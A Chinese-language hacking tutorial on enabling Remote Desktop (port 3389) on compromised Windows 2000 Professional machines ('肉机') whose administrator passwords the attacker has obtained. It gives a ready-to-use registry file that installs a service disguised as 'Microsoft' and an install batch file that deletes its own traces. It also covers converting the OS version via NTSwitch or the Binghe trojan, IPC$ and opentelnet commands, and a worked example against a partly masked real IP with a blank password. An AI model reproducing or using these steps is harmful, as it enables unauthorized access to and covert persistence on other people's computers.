远程登陆在专业版下开3389的方法大全

　　在win2000 Professional版中安装3389终端服务

　　众所周知windows2000 profassional并不支持3389终端服务，所以我们如果发现得到管理员密码的肉机是此版本，只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了!

　　方法如下：

　　1. 将profassional版改变为server版

　　2. 安装终端服务

　　关于安装终端服务的细节网络中已经有许多优秀的文章，这里不再重复。

　　下边就说说如何将profassional版改变为server版：

　　原理：其实windows 2000的各个版本都使用了同样的程序、动态链接库，它们之间最大的差别是在注册表中。windows2000三合一光盘就证明了这一点。因此只要将profassional版注册表中的相关项目改为server及以上版本，就可以在profassional版中安装终端服务了。

　　现在3am Laboratories已经将改变win2000版本的方法做成一个非常方便使用的软件：NTSwitch，让我们可以随心所欲地快速改变版本。此软件可以在小凤居中下载到，下载地址为URL http://www.chinesehack.org/down/show.asp?id=2192&down=1

　　可能由于微软的压力，3am Laboratories已将此软件从其主页中删除，大家快下载吧!

　　远程版本变换的具体实现方法：

　　法1：

　　1　在远程肉机上运行支持图形界面的远程控制程序(如：冰河、PcAnyWhere等)

　　2　远程控制下，下载并运行NTSwitch改变版本

　　3　安装3389终端服务

　　此法非常方便，技术要求最低。但操作过程对方是全部可以看见的，非常危险!

　　法2：

　　1　自己将自己本地的win2000 professional改变为win2000 server版，利用注册表对比软件对比版本变换前后注册表的差别。将差别制作成一个chang.reg文件。

　　2　利用所得到的肉机管理员密码，开启肉机Telnet服务。

　　3　Telnet上肉机后，利用regedit.exe /s chang.reg 命令， 将远程注册表改变，从而实现远程win2000的版本变换。

　　此法需要一定的经验，但操作很安全。而且可以用“迷途vb”的方法进一步安装3389终端服务。

　　以下是“迷途vb”的安装3389终端服务方法

　　========================

　　首先我们制作开启3389的工具

　　先把下面的注册表内容copy一份，另存为3389.reg注册表文件

　　注册表内容：

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

　　"Enabled"="0"

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

　　"ShutdownWithoutLogon"="0"

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

　　"EnableAdminTSRemote"=dword:00000001

　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

　　"TSEnabled"=dword:00000001

　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

　　"Start"=dword:00000002

　　[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

　　"Hotkey"="1"

　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]

　　"Start"=dword:00000002

　　"ErrorControl"=dword:00000001

　　"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00

　　"ObjectName"="LocalSystem"

　　"Type"=dword:00000010

　　"Description"="Microsoft"

　　"DisplayName"="Microsoft"

　　再把下面的内容保存为批处理文件3389.bat

　　安装批处理内容：

　　copy termsrv.exe eventlog.exe

　　regedit.exe /s 3389.reg

　　del 3389.reg

　　del 3389.exe

　　del 3389.bat

　　用winrar制作成exe自解压缩包

　　61.188.***.*** user:administrato pass:空

　　先使用工具letmein判断其操作系统

　　letmein \\ip -all -d

　　TsInternetUser (TsInternetUser)这个是2000的终端用户，现在可以判断其为2000server了

　　再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾

　　应该没有开启了

　　建立ipc连接

　　copy工具过去

　　net use \\ip\ipc$ "pass" /user:name

　　copy file \\ip\admin$\system32

　　用opentelnet开对方的telnet

　　opentelnet \\ip name pass 1 99

　　用telnet进入

　　进入到对方的winnt\system32目录

　　解压缩3389.exe

　　运行安装批处理3389.bat

　　现在我们把对方重起一下，用reboot

　　我们用ping命令监视他的上线情况，等他下线，呵呵下了，又上来了，不慌连，3389等会才能好，对方的机器有点慢看见了么，开启成功!